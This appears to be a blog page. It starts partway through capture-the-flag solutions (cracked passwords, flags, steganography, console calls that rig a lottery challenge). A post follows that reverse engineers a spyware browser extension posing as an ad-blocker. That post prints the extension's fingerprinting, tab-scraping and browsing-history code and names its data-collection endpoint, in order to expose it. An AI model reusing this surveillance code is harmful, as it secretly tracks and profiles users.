1g 0:00:00:04 DONE (2025-05-25 12:35) 0.2398g/s 12486Kp/s 12486Kc/s 12486KC/s kWoARE143..zikARE143
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The first layer file is a pdf with a lot of 30s, 31s, and 20s. I went through all the effort of decoding it just to get rickrolled

The real answer is easier

The second layer file is even easier

flag{4r3_y0u_d15tracted_by_th3_r4bb1t_h0l3}

Leaked Coordinates #

This one was really annoying because they used like a weird wikipedia name for the museum instead of the german one and I swear the hint telling you that in the challenge wasnt there initially, but basically you can look at the image or exiftools the coords to find the local "berlinspymuseum" which is the password for the image in the archive, I used aperisolve for the steganography and found base64 in the lsb https://www.aperisolve.com/f339d31d61367434755be64a698551a3

DISCORDant Glitches #

Glitch Lotto #

I avoided this one initially because I never looked at the js and was confused, but after looking at this js its pretty easy:

generateWinningNumber(new Date('June 30, 2025 05:00:00'))
# Submit a bid with that number
setTimeOverride(new Date('June 30, 2025 05:00:00'))
checkLotteryResult("yourusername")

Domain of Lies #

I didn't know what the hint meant but the odds of it being xor were high so I xor'd "flag" to the ciphertext to find the key started with Reyk = Reykjavik (Capital of Iceland)

Reverse Engineering a Shady "Ad-Blocker" Extension

2026-06-13T00:00:00+00:00

I recently ran into a sketchy ad campaign pushing a browser extension called "Stop Ads" (or StopAds Now). The ad dumps you onto a fake security warning page designed to look like an official Chrome browser update:
https://zerodrifts.com/browser-shield.html?an=ac&cid=1781376050100010USTF7gRArCNtafIG&sid=10576746

It claims that "Stop Ads" is recommended to block annoying ads and popups. If you head over to its Chrome Web Store page, the developer claims under the privacy section that they don't collect or use your data.

Since I don't trust ads pushing extensions, I decided to pull the code, reverse engineer the extension, and trace their infrastructure. Here is the chronological teardown of what I found.

Step 1: Snagging and Unpacking the CRX #

To inspect the raw files without actually installing the extension, I grabbed the extension ID from the store and used a CRX downloader tool to fetch the raw package.

Once downloaded, I renamed the .crx file to .zip and unpacked it. The directory structure immediately pointed to a complex ad-blocking setup:

manifest.json — The extension configuration file.
background.js — The main service worker orchestrating the background operations.
content/broker.js — A content script injected into web pages.
engine/ & lib/ — Helper modules managing rulesets, storage, and whitelisting.
data/ — Static rule databases, including core_engine.json (a massive 16.7MB filter list).

Step 2: Reversing the Code #

With the files unpacked, I began static code analysis, tracing execution from the manifest down to the injected scripts.

1. The Manifest Audit (`manifest.json`) #

The manifest immediately raised red flags:

It requests <all_urls> host permissions, meaning the extension can read and modify traffic on every single website you visit.
It uses the scripting API to dynamically inject code into the main web pages.
Crucially, there is no hardcoded content script array. Instead, it dynamically registers content/broker.js at runtime so it runs on all web pages.

2. The Setup Trigger: Scraping Open Tabs #

In background.js, I found the setup routine that fires immediately on installation. It runs installDataGathering():

async function installDataGathering() {
  const allTabs = await tabs.getAllTabs(1);
  const domains = new Set();
  const utms = {};
  for (const tab of allTabs) {
    if (tab.url) {
      const dom = extractHost(tab.url);
      if (dom) domains.add(dom);
      if (tabs.isStoreTab(tab) && tab.url.includes("an")) {
        try {
          Object.assign(
            utms,
            Object.fromEntries(new URL(tab.url).searchParams.entries())
          );
        } catch {}
      }
    }
  }
  if (domains.size) {
    await storage.put("core_install_sites", [...domains]);
    for (const [k, v] of Object.entries(utms)) await storage.put(k, v);
  }
}

Target Snapshot: It grabs a list of all your open tabs, extracts their domain names, and stores them under core_install_sites.
Click Attribution: It sniffs active store tabs to extract campaign parameters (an, cid, sid) from the ad referral URL, associating your install with the specific campaign.

3. The Injection Script: Fingerprinting and History Tracking #

Next, I analyzed content/broker.js, which runs on every page load. It executes two main surveillance loops:

A. Generating a Unique Hardware Fingerprint #

The script compiles a highly detailed hardware profile of the host system:

async function gatherFingerprint(vars) {
  const gpu = getGPUDetails();
  let batCharging = "unknown";
  let batLevel = "unknown";
  try {
    if ("getBattery" in navigator) {
      const battery = await navigator.getBattery();
      batCharging = battery.charging ? 1 : 0;
      batLevel = battery.level;
    }
  } catch {}

  return {
    cpu_cores: navigator.hardwareConcurrency || "unknown",
    ram_gb: navigator.deviceMemory || "unknown",
    gpu_vendor: gpu.vendor,
    gpu_renderer: gpu.renderer,
    lang: navigator.language || "unknown",
    color_depth: screen.colorDepth || "unknown",
    timezone: Intl.DateTimeFormat().resolvedOptions().timeZone || "unknown",
    canvas_data: getCanvasFingerprint(),
    touch_points: navigator.maxTouchPoints || 0,
    an: vars.an || null,
    cid: vars.cid || null,
    sid: vars.sid || null,
    screen_res: `${screen.width}x${screen.height}`,
    user_agent: navigator.userAgent,
    bat_charging: batCharging,
    bat_level: batLevel,
  };
}

Canvas Profiler: It draws a hidden graphic and extracts it as a base64 string (getCanvasFingerprint()) to create a unique graphics card signature.
Hardware Inventory: It reads your CPU cores, RAM size, GPU vendor/renderer strings, and screen resolution.

B. Logging Browsing History #

The script also logs every single website you visit, maintaining a persistent log in local storage:

(async function recordVisitedDomain() {
  ...
  const domain = normHost(location.hostname);
  if (!domain) return;
  
  const result = await chrome.storage.local.get(["core_visited_sites"]);
  let data = result?.core_visited_sites || {};
  
  if (Object.prototype.hasOwnProperty.call(data, domain)) {
    data[domain] = (Number(data[domain]) || 0) + 1;
  } else {
    data[domain] = 1;
  }
  await chrome.storage.local.set({ core_visited_sites: data });
  
  setTimeout(async () => {
    try {
      await chrome.runtime.sendMessage({
        eventName: "CHECK_AND_FETCH_DATA",
        params: { domain },
      });
    } catch {}
  }, 5000);
})();

Every time you load a website, the extension records the domain, increments the visit count, and tells the background script to check in.

4. Recovering the Exfiltration Endpoint #

Following the message path of CHECK_AND_FETCH_DATA in background.js led me to the exfiltration function (fetchData()). It bundles your open tab list, hardware fingerprint, browsing history, and campaign click IDs into a JSON packet, then does a POST request to dump it here:

https://stopads-now.com/stopads.php

Step 3: Threat Intelligence & DNS/WHOIS Analysis #

Once I mapped out the code and found the backend domains, I pivoted to WHOIS and DNS lookups to analyze their infrastructure. Both domains use Cloudflare to hide their actual hosting IPs, and both were registered through Hostinger operations in Lithuania.

1. The Ad Landing Page: `zerodrifts.com` #

IP Address Resolution: 104.21.9.98, 172.67.189.54 (Cloudflare CDN Proxy)
WHOIS Details:
- Registrar: HOSTINGER operations, UAB
- Creation Date: June 3, 2026 (Registered less than two weeks ago)
- MX Records: None. (This domain has no email capabilities configured).

2. The Exfiltration Endpoint: `stopads-now.com` #

IP Address Resolution: 104.21.1.25, 172.67.151.225 (Cloudflare CDN Proxy)
WHOIS Details:
- Registrar: HOSTINGER operations, UAB
- Creation Date: March 9, 2026
- MX Records:
  - mx1.hostinger.com (Priority 5)
  - mx2.hostinger.com (Priority 10)
  - (Points to Hostinger's standard email hosting, hosting their support address info@stopads-now.com).

Chrome Web Store Policy Violations #

Based on the evidence from the code and infrastructure, this extension violates several major Chrome Web Store developer rules:

Lying About Data Collection: The store listing claims the developer "does not collect or use your data." In reality, it harvests browsing history, hardware parameters, and canvas fingerprints.
Grabbing Unnecessary Data: An ad-blocker only needs request interception. Scraping open tabs at install and tracking navigation history is completely unnecessary.
Data Exfiltration: Secretly sending your browsing history and device fingerprint to a third-party server is classic spyware behavior.

Summary #

The "Stop Ads" extension is basically spyware wrapped in an ad-blocker's skin. It uses search ads to trick you into installing it, promises it won't track you, and then immediately starts harvesting your data. If you have this extension installed, delete it immediately from chrome://extensions/ and clear your cookies.